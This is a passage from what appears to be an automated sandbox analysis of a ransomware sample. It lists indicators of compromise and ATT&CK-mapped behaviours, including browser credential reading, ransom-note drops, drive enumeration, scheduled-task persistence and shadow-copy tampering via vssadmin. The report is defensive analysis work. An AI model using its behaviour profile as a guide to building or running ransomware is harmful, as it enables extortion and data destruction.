2344	takeown.exe
3400	Process not Found
1836	takeown.exe
352	takeown.exe
764	takeown.exe
2616	takeown.exe
1588	takeown.exe
3184	takeown.exe
3748	takeown.exe
4380	Process not Found
4908	Process not Found
4588	takeown.exe
1668	takeown.exe
3408	takeown.exe
2516	takeown.exe
4864	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral5/memory/4040-2573-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/files/0x00060000000167bf-2491.dat	upx
behavioral5/memory/1564-7869-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/540-7865-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1628-7877-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1628-7878-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3448-7882-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3448-7883-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2964-7886-0x00000000002B0000-0x0000000000327000-memory.dmp	upx
behavioral5/memory/2080-7888-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/4040-7893-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3424-7892-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2280-7906-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2280-7905-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/4124-7911-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/912-7921-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1928-7925-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/764-7916-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/764-7914-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/4188-7901-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3720-7934-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3404-7938-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/4256-7943-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/4256-7944-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/4344-7947-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/4892-7954-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/4436-7951-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/4820-7973-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2148-7969-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/4640-7964-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3396-7961-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/4320-7977-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/4344-7982-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/4296-7981-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/4684-7988-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/4472-7999-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/4996-8002-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/5016-8003-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/5016-8004-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/5064-8006-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/4504-7990-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/5064-8007-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/5100-8010-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3352-8016-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3352-8015-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3872-8019-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/4856-8021-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/4900-8022-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3748-8025-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2752-8024-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2060-8026-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3004-8027-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1528-8028-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2584-8032-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2980-8031-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2556-8034-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2556-8035-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/1568-8030-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2784-8036-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/3880-8018-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/964-8039-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2876-8012-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/2716-8046-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral5/memory/4804-7986-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Drops desktop.ini file(s) 40 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\KEQD8ZAD\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\NNULH633\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\M221U1AY\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\66RFTKYZ\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\V:	95Y5ZjHg64.exe
File opened (read-only)	\??\R:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\O:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\L:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\I:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\E:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\S:	95Y5ZjHg64.exe
File opened (read-only)	\??\P:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\N:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\G:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\H:	95Y5ZjHg64.exe
File opened (read-only)	\??\N:	95Y5ZjHg64.exe
File opened (read-only)	\??\X:	95Y5ZjHg64.exe
File opened (read-only)	\??\Q:	95Y5ZjHg64.exe
File opened (read-only)	\??\V:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\K:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\J:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\L:	95Y5ZjHg64.exe
File opened (read-only)	\??\M:	95Y5ZjHg64.exe
File opened (read-only)	\??\P:	95Y5ZjHg64.exe
File opened (read-only)	\??\Z:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\Y:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\B:	95Y5ZjHg64.exe
File opened (read-only)	\??\G:	95Y5ZjHg64.exe
File opened (read-only)	\??\Y:	95Y5ZjHg64.exe
File opened (read-only)	\??\S:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\M:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\H:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\Z:	95Y5ZjHg64.exe
File opened (read-only)	\??\E:	95Y5ZjHg64.exe
File opened (read-only)	\??\J:	95Y5ZjHg64.exe
File opened (read-only)	\??\K:	95Y5ZjHg64.exe
File opened (read-only)	\??\T:	95Y5ZjHg64.exe
File opened (read-only)	\??\U:	95Y5ZjHg64.exe
File opened (read-only)	\??\W:	95Y5ZjHg64.exe
File opened (read-only)	\??\T:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\Q:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\I:	95Y5ZjHg64.exe
File opened (read-only)	\??\O:	95Y5ZjHg64.exe
File opened (read-only)	\??\X:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\W:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\U:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\A:	95Y5ZjHg64.exe
File opened (read-only)	\??\R:	95Y5ZjHg64.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\S65PBpRR.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Chisinau	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\manifest.json	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\ktab.exe	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Godthab	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sampler.xml	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\klist.exe	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vlc.mo	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Antarctica\Vostok	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\uk.pak	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ext_5.5.0.165303.jar	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\ext\meta-index	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface_3.10.1.v20140813-1009.jar	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_ja.jar	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\CST6CDT	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.zh_CN_5.5.0.165303.jar	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tarawa	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-ui.xml	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Srednekolymsk	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\fr-FR\FreeCell.exe.mui	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Microsoft Games\Minesweeper\MineSweeper.exe	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Karachi	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Backgammon\es-ES\bckgzm.exe.mui	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Australia\Broken_Hill	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome.exe.sig	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Tahiti	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Amsterdam	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\bin\dblook	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Microsoft Games\Minesweeper\ja-JP\Minesweeper.exe.mui	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Ashgabat	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\jamendo.luac	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-execution.xml	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Argentina\Tucuman	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-search.xml	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\wsgen.exe	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Mozilla Firefox\application.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Updater.api	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_globalstyle.css	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\extensions\VLSub.luac	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-ui.xml	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tashkent	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Merida	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Gaza	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DVA.api	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bahia_Banderas	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Azores	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\bin\server\Xusage.txt	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\More Games\de-DE\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Currie	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre7\lib\fonts\LucidaSansDemiBold.ttf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3968	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
4228	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1472	powershell.exe
1912	95Y5ZjHg64.exe
1912	95Y5ZjHg64.exe
1912	95Y5ZjHg64.exe
1912	95Y5ZjHg64.exe
1912	95Y5ZjHg64.exe
1912	95Y5ZjHg64.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
1912	95Y5ZjHg64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1472	powershell.exe
Token: SeDebugPrivilege	1912	95Y5ZjHg64.exe
Token: SeLoadDriverPrivilege	1912	95Y5ZjHg64.exe
Token: SeBackupPrivilege	3800	vssvc.exe
Token: SeRestorePrivilege	3800	vssvc.exe
Token: SeAuditPrivilege	3800	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1700	WMIC.exe
Token: SeSecurityPrivilege	1700	WMIC.exe
Token: SeTakeOwnershipPrivilege	1700	WMIC.exe
Token: SeLoadDriverPrivilege	1700	WMIC.exe
Token: SeSystemProfilePrivilege	1700	WMIC.exe
